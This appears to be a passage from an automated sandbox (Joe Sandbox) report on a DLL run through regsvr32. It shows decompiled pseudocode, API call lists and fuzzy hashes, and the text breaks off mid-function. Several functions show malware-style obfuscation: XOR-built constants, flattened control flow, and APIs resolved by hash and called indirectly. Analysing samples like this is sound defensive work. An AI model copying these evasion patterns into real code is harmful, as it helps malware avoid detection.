                                                                                                                0x10010421
                                                                                                                0x10010426
                                                                                                                0x1001042a
                                                                                                                0x1001042c
                                                                                                                0x10010430
                                                                                                                0x10010431
                                                                                                                0x10010433
                                                                                                                0x10010433
                                                                                                                0x10010438
                                                                                                                0x10010438
                                                                                                                0x1001043d
                                                                                                                0x10010445
                                                                                                                0x10010449
                                                                                                                0x1001044e
                                                                                                                0x1001044e
                                                                                                                0x10010452
                                                                                                                0x10010452
                                                                                                                0x10010452
                                                                                                                0x10010456
                                                                                                                0x10010459
                                                                                                                0x1001045e
                                                                                                                0x10010462
                                                                                                                0x10010464
                                                                                                                0x10010468
                                                                                                                0x10010469
                                                                                                                0x1001046b
                                                                                                                0x1001046b
                                                                                                                0x10010470
                                                                                                                0x10010470
                                                                                                                0x10010475
                                                                                                                0x1001047d
                                                                                                                0x10010481
                                                                                                                0x10010486
                                                                                                                0x10010486
                                                                                                                0x1001048a
                                                                                                                0x1001048a
                                                                                                                0x1001048a
                                                                                                                0x1001048e
                                                                                                                0x10010491
                                                                                                                0x10010496
                                                                                                                0x1001049a
                                                                                                                0x1001049c
                                                                                                                0x100104a0
                                                                                                                0x100104a1
                                                                                                                0x100104a3
                                                                                                                0x100104a3
                                                                                                                0x100104a8
                                                                                                                0x100104a8
                                                                                                                0x100104ad
                                                                                                                0x100104b5
                                                                                                                0x100104b9
                                                                                                                0x100104be
                                                                                                                0x100104be
                                                                                                                0x100104c2
                                                                                                                0x100104c2
                                                                                                                0x100104c2
                                                                                                                0x100104c6
                                                                                                                0x100104c9
                                                                                                                0x100104ce
                                                                                                                0x100104d2
                                                                                                                0x100104d4
                                                                                                                0x100104d8
                                                                                                                0x100104d9
                                                                                                                0x100104db
                                                                                                                0x100104db
                                                                                                                0x100104e0
                                                                                                                0x100104e0
                                                                                                                0x100104e5
                                                                                                                0x100104e9
                                                                                                                0x100104ed
                                                                                                                0x100104f1
                                                                                                                0x100104f6
                                                                                                                0x100104f6
                                                                                                                0x100104f6
                                                                                                                0x100104fa
                                                                                                                0x100104ff
                                                                                                                0x10010503
                                                                                                                0x10010507
                                                                                                                0x1001050c
                                                                                                                0x10010510
                                                                                                                0x10010515
                                                                                                                0x10010517
                                                                                                                0x1001051c
                                                                                                                0x1001051c
                                                                                                                0x10010522
                                                                                                                0x10010526
                                                                                                                0x1001052d
                                                                                                                0x1001052d
                                                                                                                0x10010532
                                                                                                                0x10010536
                                                                                                                0x10010541
                                                                                                                0x10010548
                                                                                                                0x1001054f
                                                                                                                0x1001055e
                                                                                                                0x1001055e
                                                                                                                0x1001027f
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 100102A7
                                                                                                                • TerminateThread.KERNEL32(?,00000000,DF7C0CDA), ref: 100102C0
                                                                                                                • SendMessageA.USER32 ref: 100102DF
                                                                                                                • ExitWindowsEx.USER32(00000008,00000000), ref: 1001051C
                                                                                                                  • Part of subcall function 1001D2C4: IsWindow.USER32(?), ref: 1001D2D3
                                                                                                                  • Part of subcall function 1003BD06: __mbscmp_l.LIBCMT ref: 1003BD10
                                                                                                                  • Part of subcall function 10026562: SendMessageA.USER32 ref: 100265A4
                                                                                                                  • Part of subcall function 1002637C: SendMessageA.USER32 ref: 1002639D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$ExitTerminateThreadWindowWindows__mbscmp_l
                                                                                                                • String ID: Setting\ScanSet.dat
                                                                                                                • API String ID: 3643140477-908802073
                                                                                                                • Opcode ID: da9b098861b42dcb7b3c0e4e5e6ea2826502a9b463fde0e3635a1d817de97ba1
                                                                                                                • Instruction ID: c31bd651603e65f7edcd71fbcebb0dfd6ac57d96a755493a4ff4c0ef553417ba
                                                                                                                • Opcode Fuzzy Hash: da9b098861b42dcb7b3c0e4e5e6ea2826502a9b463fde0e3635a1d817de97ba1
                                                                                                                • Instruction Fuzzy Hash: 55E18B752043419FE304DB54CD95FAA77E6FB84318F44892CF5858B292DBB0F985CB52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E1000B6D0(void* __ecx, void* __ebp) {
                                                                                                                				signed int _v4;
                                                                                                                				signed int _v8;
                                                                                                                				int _v88;
                                                                                                                				char _v92;
                                                                                                                				struct tagRECT _v108;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t17;
                                                                                                                				int _t20;
                                                                                                                				void* _t21;
                                                                                                                				int _t25;
                                                                                                                				int _t26;
                                                                                                                				void* _t43;
                                                                                                                				void* _t45;
                                                                                                                				void* _t47;
                                                                                                                				void* _t58;
                                                                                                                				void* _t61;
                                                                                                                				void* _t64;
                                                                                                                				void* _t65;
                                                                                                                				signed int _t67;
                                                                                                                
                                                                                                                				_t67 =  &(_v108.top);
                                                                                                                				_t17 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_v4 = _t17 ^ _t67;
                                                                                                                				_t65 = __ecx;
                                                                                                                				_t20 = IsIconic( *(__ecx + 0x20));
                                                                                                                				_t68 = _t20;
                                                                                                                				if(_t20 == 0) {
                                                                                                                					_t21 = E10020CCF(_t45, _t65, _t61, _t65, __eflags);
                                                                                                                					__eflags = _v4 ^ _t67;
                                                                                                                					return E1003B437(_t21, _t45, _v4 ^ _t67, _t58, _t61, _t65);
                                                                                                                				} else {
                                                                                                                					_push(_t45);
                                                                                                                					E100246DF(_t45,  &_v88, _t61, _t65, _t68);
                                                                                                                					SendMessageA( *(_t65 + 0x20), 0x27, _v88, 0);
                                                                                                                					_t25 = GetSystemMetrics(0xb);
                                                                                                                					_t26 = GetSystemMetrics(0xc);
                                                                                                                					GetClientRect( *(_t65 + 0x20),  &_v108);
                                                                                                                					_t60 =  *(_t65 + 0x7dc);
                                                                                                                					asm("cdq");
                                                                                                                					asm("cdq");
                                                                                                                					DrawIcon(_v88, _v108.right - _v108.left - _t25 + 1 -  *(_t65 + 0x7dc) >> 1, _v108.bottom - _v108.top - _t26 + 1 -  *(_t65 + 0x7dc) >> 1, _t60);
                                                                                                                					_t43 = E10024733(_t25,  &_v92, _t26, _t65, _t68);
                                                                                                                					_t64 = _t65;
                                                                                                                					_t47 = _t61;
                                                                                                                					return E1003B437(_t43, _t47, _v8 ^ _t67, _t60, _t64, _t65);
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • IsIconic.USER32(?), ref: 1000B6E5
                                                                                                                  • Part of subcall function 100246DF: __EH_prolog3.LIBCMT ref: 100246E6
                                                                                                                  • Part of subcall function 100246DF: BeginPaint.USER32(?,?), ref: 10024712
                                                                                                                • SendMessageA.USER32 ref: 1000B70C
                                                                                                                • GetSystemMetrics.USER32 ref: 1000B71A
                                                                                                                • GetSystemMetrics.USER32 ref: 1000B720
                                                                                                                • GetClientRect.USER32 ref: 1000B72D
                                                                                                                • DrawIcon.USER32(?,?,?,?), ref: 1000B765
                                                                                                                  • Part of subcall function 10024733: __EH_prolog3.LIBCMT ref: 1002473A
                                                                                                                  • Part of subcall function 10024733: EndPaint.USER32(?,?), ref: 10024755
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog3MetricsPaintSystem$BeginClientDrawIconIconicMessageRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2914073315-0
                                                                                                                • Opcode ID: b5294d1bd409c8458774b6e8a906c1978f2e357e8a3c9c5a38e7f1882f681795
                                                                                                                • Instruction ID: c09878a863cf53de5ad18f968702e5e3749ae34195064ec774b844a3ca483362
                                                                                                                • Opcode Fuzzy Hash: b5294d1bd409c8458774b6e8a906c1978f2e357e8a3c9c5a38e7f1882f681795
                                                                                                                • Instruction Fuzzy Hash: EE2138762047019FD714DF78DC8AE6B77EAFB88200F454A09F589C7284DA24E8048A52
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E001A71E3(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                				intOrPtr _v60;
                                                                                                                				char _v68;
                                                                                                                				char _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				signed int _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				signed int _v156;
                                                                                                                				signed int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				signed int _v184;
                                                                                                                				signed int _v188;
                                                                                                                				char _t278;
                                                                                                                				signed int _t302;
                                                                                                                				signed int _t305;
                                                                                                                				signed int _t306;
                                                                                                                				signed int _t307;
                                                                                                                				signed int _t308;
                                                                                                                				signed int _t309;
                                                                                                                				signed int _t310;
                                                                                                                				void* _t312;
                                                                                                                				void* _t339;
                                                                                                                				intOrPtr _t340;
                                                                                                                				signed int* _t343;
                                                                                                                
                                                                                                                				_push(_a28);
                                                                                                                				_t339 = __edx;
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(0);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(0);
                                                                                                                				_t278 = E001AC98A(0);
                                                                                                                				_v72 = _t278;
                                                                                                                				_t343 =  &(( &_v188)[9]);
                                                                                                                				_v136 = 0x7a0c61;
                                                                                                                				_t340 = _t278;
                                                                                                                				_v136 = _v136 ^ 0xa476c4b6;
                                                                                                                				_v136 = _v136 ^ 0x7f31ef9b;
                                                                                                                				_t312 = 0xa433ec5;
                                                                                                                				_v136 = _v136 ^ 0xdb3d234c;
                                                                                                                				_v148 = 0xda6be4;
                                                                                                                				_v148 = _v148 | 0xce70a5d4;
                                                                                                                				_v148 = _v148 + 0x6c5d;
                                                                                                                				_v148 = _v148 ^ 0xcefb5c71;
                                                                                                                				_v140 = 0x731c8b;
                                                                                                                				_v140 = _v140 << 0xe;
                                                                                                                				_v140 = _v140 >> 1;
                                                                                                                				_v140 = _v140 ^ 0x639371ab;
                                                                                                                				_v180 = 0x893c1;
                                                                                                                				_v180 = _v180 + 0xe5dc;
                                                                                                                				_v180 = _v180 + 0xffff42f5;
                                                                                                                				_v180 = _v180 >> 1;
                                                                                                                				_v180 = _v180 ^ 0x0001e28a;
                                                                                                                				_v156 = 0xa30290;
                                                                                                                				_t305 = 0x4e;
                                                                                                                				_v156 = _v156 / _t305;
                                                                                                                				_v156 = _v156 + 0xffffc5c7;
                                                                                                                				_v156 = _v156 + 0x431e;
                                                                                                                				_v156 = _v156 ^ 0x000277f0;
                                                                                                                				_v144 = 0xe35d8c;
                                                                                                                				_v144 = _v144 ^ 0x27fc3cba;
                                                                                                                				_t306 = 0x7a;
                                                                                                                				_v144 = _v144 * 0x4e;
                                                                                                                				_v144 = _v144 ^ 0xeb80c3fe;
                                                                                                                				_v76 = 0xf32743;
                                                                                                                				_v76 = _v76 | 0xf99a28d0;
                                                                                                                				_v76 = _v76 ^ 0xf9f75051;
                                                                                                                				_v124 = 0xf9648a;
                                                                                                                				_v124 = _v124 / _t306;
                                                                                                                				_v124 = _v124 ^ 0xe87cc025;
                                                                                                                				_v124 = _v124 ^ 0xe876b4a5;
                                                                                                                				_v108 = 0x361314;
                                                                                                                				_v108 = _v108 + 0xffff50f6;
                                                                                                                				_v108 = _v108 ^ 0x0038a8eb;
                                                                                                                				_v132 = 0xe9406f;
                                                                                                                				_t80 =  &_v132; // 0xe9406f
                                                                                                                				_t307 = 0x17;
                                                                                                                				_v132 =  *_t80 / _t307;
                                                                                                                				_v132 = _v132 * 0x7e;
                                                                                                                				_v132 = _v132 ^ 0x04f12271;
                                                                                                                				_v80 = 0xd4f1cf;
                                                                                                                				_v80 = _v80 + 0x8964;
                                                                                                                				_v80 = _v80 ^ 0x00d47933;
                                                                                                                				_v164 = 0xa26b3;
                                                                                                                				_v164 = _v164 + 0xec01;
                                                                                                                				_v164 = _v164 << 4;
                                                                                                                				_v164 = _v164 | 0x3475bd9e;
                                                                                                                				_v164 = _v164 ^ 0x34fb0d19;
                                                                                                                				_v96 = 0x624455;
                                                                                                                				_v96 = _v96 + 0xffffc667;
                                                                                                                				_v96 = _v96 ^ 0x0067123a;
                                                                                                                				_v168 = 0x4017b4;
                                                                                                                				_v168 = _v168 + 0x33fb;
                                                                                                                				_v168 = _v168 ^ 0xbefdc35f;
                                                                                                                				_v168 = _v168 + 0x104b;
                                                                                                                				_v168 = _v168 ^ 0xbeb0c8ee;
                                                                                                                				_v176 = 0xef39e8;
                                                                                                                				_v176 = _v176 >> 7;
                                                                                                                				_v176 = _v176 + 0x46c6;
                                                                                                                				_v176 = _v176 << 3;
                                                                                                                				_v176 = _v176 ^ 0x001031bb;
                                                                                                                				_v100 = 0x527242;
                                                                                                                				_v100 = _v100 >> 0xd;
                                                                                                                				_v100 = _v100 ^ 0x0003c6bf;
                                                                                                                				_v184 = 0xf87c35;
                                                                                                                				_v184 = _v184 ^ 0x4f0be4af;
                                                                                                                				_v184 = _v184 | 0x88219044;
                                                                                                                				_t308 = 0x12;
                                                                                                                				_v184 = _v184 / _t308;
                                                                                                                				_v184 = _v184 ^ 0x0b837421;
                                                                                                                				_v188 = 0x6609a3;
                                                                                                                				_v188 = _v188 + 0xffff27b2;
                                                                                                                				_v188 = _v188 + 0xffffe934;
                                                                                                                				_v188 = _v188 << 5;
                                                                                                                				_v188 = _v188 ^ 0x0caf2d86;
                                                                                                                				_v128 = 0x23974d;
                                                                                                                				_v128 = _v128 ^ 0x14b31f9a;
                                                                                                                				_t309 = 0x68;
                                                                                                                				_v128 = _v128 / _t309;
                                                                                                                				_v128 = _v128 ^ 0x003d2987;
                                                                                                                				_v104 = 0x26c933;
                                                                                                                				_v104 = _v104 + 0xffff5977;
                                                                                                                				_v104 = _v104 ^ 0x002283ea;
                                                                                                                				_v116 = 0xdfcf2f;
                                                                                                                				_v116 = _v116 ^ 0xe376d356;
                                                                                                                				_v116 = _v116 << 3;
                                                                                                                				_v116 = _v116 ^ 0x1d47d51b;
                                                                                                                				_v172 = 0x35999a;
                                                                                                                				_v172 = _v172 ^ 0xff2b297f;
                                                                                                                				_v172 = _v172 >> 0xf;
                                                                                                                				_v172 = _v172 | 0xa38aa7d7;
                                                                                                                				_v172 = _v172 ^ 0xa38b9b15;
                                                                                                                				_v88 = 0xbf825c;
                                                                                                                				_v88 = _v88 << 0xf;
                                                                                                                				_v88 = _v88 ^ 0xc1276f63;
                                                                                                                				_v152 = 0x108f7a;
                                                                                                                				_v152 = _v152 + 0xffff32d6;
                                                                                                                				_v152 = _v152 + 0xffffb35f;
                                                                                                                				_t310 = 0x7b;
                                                                                                                				_v152 = _v152 / _t310;
                                                                                                                				_v152 = _v152 ^ 0x0000a3b8;
                                                                                                                				_v160 = 0xc46e48;
                                                                                                                				_v160 = _v160 + 0xffffa311;
                                                                                                                				_v160 = _v160 ^ 0x724e5849;
                                                                                                                				_v160 = _v160 + 0x85d9;
                                                                                                                				_v160 = _v160 ^ 0x72860fd9;
                                                                                                                				_v112 = 0x6f0466;
                                                                                                                				_v112 = _v112 + 0xffff767f;
                                                                                                                				_v112 = _v112 ^ 0x6bb1e2ba;
                                                                                                                				_v112 = _v112 ^ 0x6bd60be8;
                                                                                                                				_v120 = 0x115719;
                                                                                                                				_v120 = _v120 << 1;
                                                                                                                				_v120 = _v120 ^ 0x2b2b6280;
                                                                                                                				_v120 = _v120 ^ 0x2b08d458;
                                                                                                                				_v84 = 0x468437;
                                                                                                                				_v84 = _v84 | 0x5b37428e;
                                                                                                                				_v84 = _v84 ^ 0x5b73edda;
                                                                                                                				_v92 = 0xdec2c2;
                                                                                                                				_v92 = _v92 | 0x58c7ad75;
                                                                                                                				_v92 = _v92 ^ 0x58df3aa7;
                                                                                                                				do {
                                                                                                                					while(_t312 != 0x2f0571) {
                                                                                                                						if(_t312 == 0x1f67348) {
                                                                                                                							_push(_t312);
                                                                                                                							_t302 = E001C22F2(_v140, _a28, _v180,  &_v72, _v156, _v144);
                                                                                                                							_t343 =  &(_t343[5]);
                                                                                                                							__eflags = _t302;
                                                                                                                							if(_t302 != 0) {
                                                                                                                								_t312 = 0x2f0571;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							if(_t312 == 0x8881ed1) {
                                                                                                                								E001B8E1D(_v72, _v84, _v92);
                                                                                                                							} else {
                                                                                                                								if(_t312 != 0xa433ec5) {
                                                                                                                									goto L9;
                                                                                                                								} else {
                                                                                                                									_t312 = 0x1f67348;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L12:
                                                                                                                						return _t340;
                                                                                                                					}
                                                                                                                					E001B25CD(_v76, _v124, 0x44, _v108,  &_v68);
                                                                                                                					_push(_v96);
                                                                                                                					_v68 = 0x44;
                                                                                                                					_push(0x1a1268);
                                                                                                                					_push(_v164);
                                                                                                                					_t314 = _v132;
                                                                                                                					_v60 = E001BF5D9(_v132, _v80, __eflags);
                                                                                                                					__eflags = _v148 | _v136;
                                                                                                                					_t340 = E001B23C7(_v168, _v176, _v100, _v184, _v188, _v72,  &_v68, _v128, _v148 | _v136, _v132, _v132, _v104, _t314, _a28, _v116, _v172, 0, _a20, _t339, _t314, _v88);
                                                                                                                					E001BF94B(_v60, _v152, _v160, _v112, _v120);
                                                                                                                					_t343 =  &(_t343[0x1c]);
                                                                                                                					_t312 = 0x8881ed1;
                                                                                                                					L9:
                                                                                                                					__eflags = _t312 - 0x8f0d87;
                                                                                                                				} while (_t312 != 0x8f0d87);
                                                                                                                				goto L12;
                                                                                                                			}


                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: BrR$D$IXNr$UDb$]l$o@$9
                                                                                                                • API String ID: 0-356127896
                                                                                                                • Opcode ID: 0aaa061ee81c2b6729ee47dda7435df833cfd2b01a9e716eb2d97dda09cd1f7f
                                                                                                                • Instruction ID: 99342eb500158b5d4bc910bf1a1b4c823ee3c135a57e077ebfeb4fdf37e598dc
                                                                                                                • Opcode Fuzzy Hash: 0aaa061ee81c2b6729ee47dda7435df833cfd2b01a9e716eb2d97dda09cd1f7f
                                                                                                                • Instruction Fuzzy Hash: 50D110720093809FD3A4CF61C88AA5FFBE1FB95754F10891CF29A96260C7B58959CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E001BE168(intOrPtr* __ecx) {
                                                                                                                				char _v128;
                                                                                                                				signed int _v132;
                                                                                                                				intOrPtr _v136;
                                                                                                                				signed int _v140;
                                                                                                                				signed int _v144;
                                                                                                                				signed int _v148;
                                                                                                                				signed int _v152;
                                                                                                                				intOrPtr* _v156;
                                                                                                                				unsigned int _v160;
                                                                                                                				signed int _v164;
                                                                                                                				signed int _v168;
                                                                                                                				signed int _v172;
                                                                                                                				signed int _v176;
                                                                                                                				signed int _v180;
                                                                                                                				signed int _v184;
                                                                                                                				signed int _v188;
                                                                                                                				signed int _v192;
                                                                                                                				signed int _v196;
                                                                                                                				signed int _v200;
                                                                                                                				signed int _v204;
                                                                                                                				signed int _v208;
                                                                                                                				signed int _v212;
                                                                                                                				signed int _v216;
                                                                                                                				signed int _v220;
                                                                                                                				signed int _v224;
                                                                                                                				signed int _v228;
                                                                                                                				signed int _v232;
                                                                                                                				void* _t222;
                                                                                                                				void* _t224;
                                                                                                                				signed int _t239;
                                                                                                                				signed int _t242;
                                                                                                                				intOrPtr* _t243;
                                                                                                                				signed int _t267;
                                                                                                                				signed int _t268;
                                                                                                                				signed int _t269;
                                                                                                                				signed int _t270;
                                                                                                                				signed int _t271;
                                                                                                                				void* _t272;
                                                                                                                				signed int _t275;
                                                                                                                				signed int* _t276;
                                                                                                                
                                                                                                                				_t243 = __ecx;
                                                                                                                				_t276 =  &_v232;
                                                                                                                				_v156 = __ecx;
                                                                                                                				_v132 = _v132 & 0x00000000;
                                                                                                                				_v136 = 0xee8771;
                                                                                                                				_v192 = 0x117fd;
                                                                                                                				_v192 = _v192 | 0x1d6a2708;
                                                                                                                				_v192 = _v192 ^ 0x1d606f88;
                                                                                                                				_v152 = 0xf4b7c1;
                                                                                                                				_v152 = _v152 << 5;
                                                                                                                				_v152 = _v152 ^ 0x1e95570e;
                                                                                                                				_v144 = 0xfe12e3;
                                                                                                                				_v144 = _v144 | 0x54cbb312;
                                                                                                                				_v144 = _v144 ^ 0x54f6fa6e;
                                                                                                                				_v208 = 0x534ee7;
                                                                                                                				_v208 = _v208 >> 6;
                                                                                                                				_t267 = 0x35;
                                                                                                                				_v208 = _v208 / _t267;
                                                                                                                				_v208 = _v208 + 0xffff6f6b;
                                                                                                                				_t272 = 0x83f99c0;
                                                                                                                				_v208 = _v208 ^ 0xfff14d46;
                                                                                                                				_v172 = 0xc94499;
                                                                                                                				_v172 = _v172 + 0x11d2;
                                                                                                                				_v172 = _v172 >> 8;
                                                                                                                				_v172 = _v172 ^ 0x000f0cb6;
                                                                                                                				_v228 = 0x751ae;
                                                                                                                				_t268 = 0x2e;
                                                                                                                				_v228 = _v228 / _t268;
                                                                                                                				_v228 = _v228 + 0xffffae70;
                                                                                                                				_v228 = _v228 | 0xa36e753b;
                                                                                                                				_v228 = _v228 ^ 0xfff46ae6;
                                                                                                                				_v176 = 0x1a7255;
                                                                                                                				_v176 = _v176 << 4;
                                                                                                                				_v176 = _v176 + 0xffff0783;
                                                                                                                				_v176 = _v176 ^ 0x01a682c2;
                                                                                                                				_v164 = 0xe36d6f;
                                                                                                                				_v164 = _v164 ^ 0xb397a4d2;
                                                                                                                				_v164 = _v164 ^ 0xb37dbef8;
                                                                                                                				_v212 = 0xf88382;
                                                                                                                				_v212 = _v212 ^ 0x1a92608a;
                                                                                                                				_v212 = _v212 + 0xffff7ea5;
                                                                                                                				_t269 = 0x5e;
                                                                                                                				_v212 = _v212 / _t269;
                                                                                                                				_v212 = _v212 ^ 0x0041f51b;
                                                                                                                				_v168 = 0x2ed612;
                                                                                                                				_v168 = _v168 ^ 0x7e3753ae;
                                                                                                                				_v168 = _v168 ^ 0x7e1e684c;
                                                                                                                				_v224 = 0xc32fee;
                                                                                                                				_v224 = _v224 ^ 0x529128d1;
                                                                                                                				_v224 = _v224 << 3;
                                                                                                                				_v224 = _v224 ^ 0x1753897f;
                                                                                                                				_v224 = _v224 ^ 0x85c8b1aa;
                                                                                                                				_v148 = 0xc50457;
                                                                                                                				_v148 = _v148 + 0x7d80;
                                                                                                                				_v148 = _v148 ^ 0x00cb96db;
                                                                                                                				_v160 = 0x145c88;
                                                                                                                				_v160 = _v160 >> 0xf;
                                                                                                                				_v160 = _v160 ^ 0x000af213;
                                                                                                                				_v140 = 0x224ded;
                                                                                                                				_v140 = _v140 + 0x4843;
                                                                                                                				_v140 = _v140 ^ 0x0020cf31;
                                                                                                                				_v216 = 0x41dfd5;
                                                                                                                				_v216 = _v216 + 0xffff4a02;
                                                                                                                				_v216 = _v216 | 0xaf3fa73f;
                                                                                                                				_v216 = _v216 ^ 0xaf7fe239;
                                                                                                                				_v196 = 0x952dc;
                                                                                                                				_v196 = _v196 << 0xf;
                                                                                                                				_v196 = _v196 ^ 0x69ad3ccd;
                                                                                                                				_v196 = _v196 ^ 0xc0c4200a;
                                                                                                                				_v184 = 0x7c7b83;
                                                                                                                				_v184 = _v184 << 4;
                                                                                                                				_v184 = _v184 << 9;
                                                                                                                				_v184 = _v184 ^ 0x8f72bfe3;
                                                                                                                				_v220 = 0x982520;
                                                                                                                				_v220 = _v220 + 0xffff0e3e;
                                                                                                                				_v220 = _v220 ^ 0x8960c3b3;
                                                                                                                				_v220 = _v220 ^ 0xa2afcaef;
                                                                                                                				_v220 = _v220 ^ 0x2b5f563a;
                                                                                                                				_v232 = 0xe8ca7a;
                                                                                                                				_t270 = 0x7e;
                                                                                                                				_v232 = _v232 / _t270;
                                                                                                                				_v232 = _v232 | 0xf34d851f;
                                                                                                                				_v232 = _v232 ^ 0x94a10a03;
                                                                                                                				_v232 = _v232 ^ 0x67e9f08a;
                                                                                                                				_v180 = 0x10d3c5;
                                                                                                                				_v180 = _v180 + 0xfffff1c0;
                                                                                                                				_v180 = _v180 ^ 0x411976c6;
                                                                                                                				_v180 = _v180 ^ 0x410a8cec;
                                                                                                                				_v188 = 0xeb6b7a;
                                                                                                                				_v188 = _v188 >> 7;
                                                                                                                				_v188 = _v188 + 0x2cfe;
                                                                                                                				_v188 = _v188 ^ 0x000f3824;
                                                                                                                				_v204 = 0x31cedb;
                                                                                                                				_v204 = _v204 << 9;
                                                                                                                				_v204 = _v204 + 0xae1;
                                                                                                                				_v204 = _v204 * 0x7d;
                                                                                                                				_v204 = _v204 ^ 0xa403ef67;
                                                                                                                				_v200 = 0xbf2f36;
                                                                                                                				_v200 = _v200 + 0x3628;
                                                                                                                				_v200 = _v200 ^ 0x00b9258e;
                                                                                                                				_t271 = _v200;
                                                                                                                				_t275 = _v200;
                                                                                                                				_t242 = _v200;
                                                                                                                				while(1) {
                                                                                                                					L1:
                                                                                                                					_t222 = 0xc1521a1;
                                                                                                                					do {
                                                                                                                						while(_t272 != 0x30d24b1) {
                                                                                                                							if(_t272 == 0x83f99c0) {
                                                                                                                								_t272 = 0xc42f0e7;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t272 == _t222) {
                                                                                                                									_push(_v184);
                                                                                                                									_push(0x1a1760);
                                                                                                                									_push(_v196);
                                                                                                                									_t224 = E001BF5D9(_v140, _v216, __eflags);
                                                                                                                									_t276 =  &(_t276[3]);
                                                                                                                									_push(_t271);
                                                                                                                									_push( &_v128);
                                                                                                                									_push(_t224);
                                                                                                                									_push(_t275);
                                                                                                                									_push(_t242);
                                                                                                                									 *((intOrPtr*)(E001AADB7(_v140, 0x9f864bbe, 0x270)))();
                                                                                                                									E001BF94B(_t224, _v220, _v232, _v180, _v188);
                                                                                                                									_t272 = 0xe10e475;
                                                                                                                									goto L12;
                                                                                                                								} else {
                                                                                                                									if(_t272 == 0xc42f0e7) {
                                                                                                                										_push(0x10);
                                                                                                                										_t275 = E001B96D4(_t243, 1);
                                                                                                                										E001A8744(_v208, _v172, 0xb, _v228, _t275,  &_v128, _v176);
                                                                                                                										_t272 = 0x30d24b1;
                                                                                                                										L12:
                                                                                                                										_t276 =  &(_t276[8]);
                                                                                                                										L13:
                                                                                                                										_t243 = _v156;
                                                                                                                										goto L1;
                                                                                                                									} else {
                                                                                                                										if(_t272 == 0xc83c513) {
                                                                                                                											_t275 = 0x4000;
                                                                                                                											_push(_t243);
                                                                                                                											_t239 = E001A303A(_t243, 0x4000);
                                                                                                                											_t243 = _v156;
                                                                                                                											_t242 = _t239;
                                                                                                                											_t276 =  &(_t276[3]);
                                                                                                                											__eflags = _t242;
                                                                                                                											_t222 = 0xc1521a1;
                                                                                                                											_t272 =  !=  ? 0xc1521a1 : 0xe10e475;
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                											if(_t272 != 0xe10e475) {
                                                                                                                												goto L19;
                                                                                                                											} else {
